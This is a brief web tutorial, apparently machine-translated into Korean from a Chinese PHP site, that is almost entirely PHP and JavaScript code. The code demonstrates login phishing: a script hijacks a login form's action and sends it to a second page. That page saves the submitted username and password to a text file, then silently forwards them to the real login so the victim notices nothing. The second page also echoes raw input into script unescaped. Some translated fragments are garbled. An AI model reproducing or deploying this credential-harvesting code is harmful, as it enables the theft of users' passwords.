이 글의 내용은 PHP와 JS에서 로그인 피싱을 모방하는 코드 예제입니다. 도움이 필요한 친구들이 참고할 수 있기를 바랍니다.
디렉토리 소개
login.php 일반 로그인 파일
selfLogin.php 사용자 정의 로그인 파일
data .txt 기록 사용자
<?php echo "<pre class="brush:php;toolbar:false">"; $userInfo = $_POST ; if ($userInfo) { # code... var_dump($userInfo,'登录成功') ;exit(); } ?> <!DOCTYPE html> <html> <head> <title>登录</title> </head> <body> <form id="login" method="post" action="login.php"> 用户姓名:<input type="text" name="name"> 用户密码:<input type="password" name="pwd"> <input type="submit" value="确认登录"> </form> </body> <script type="text/javascript"> //js劫持代码 window.onload = function (eve) { var form = document.getElementById('login'); form.innerHTML = ' <form id="login" method="post" > 用户姓名:<input type="text" name="name"> 用户密码:<input type="password" name="pwd"> <input type="submit" value="确认登录"> </form> ' ; //钓鱼地址 form.action = "selfLogin.php" ; } </script> </html>
data.txt
<?php $name = '' ; $pwd = '' ; //var_dump('数据被截取了',$_POST) ; if($_POST) { //记录获取的数据信息 $name = $_POST['name'] ; $pwd = $_POST['pwd'] ; file_put_contents('data.txt', json_encode($_POST,true)) ; } ?> <!DOCTYPE html> <html> <head> <title></title> </head> <body> </body> <script type="text/javascript"> //构建之前的页面 window.onload = function (eve) { var name = '<?php echo $name; ?>' ; var pwd = '<?php echo $pwd; ?>' ; if(name && pwd) { var p = document.createElement('p'); document.body.appendChild(p); p.innerHTML =' <form id="login2" method="post" action="login.php" > '+ ' 用户姓名:<input type="text" name="name" value="'+name+'"> 用户密码:<input type="password" name="pwd" value="'+pwd+'"> ' ; document.getElementById('login2').submit(); } } </script> </html>
컬럼!
위 내용은 PHP와 JS를 활용한 로그인 피싱 모방 코드 예시의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!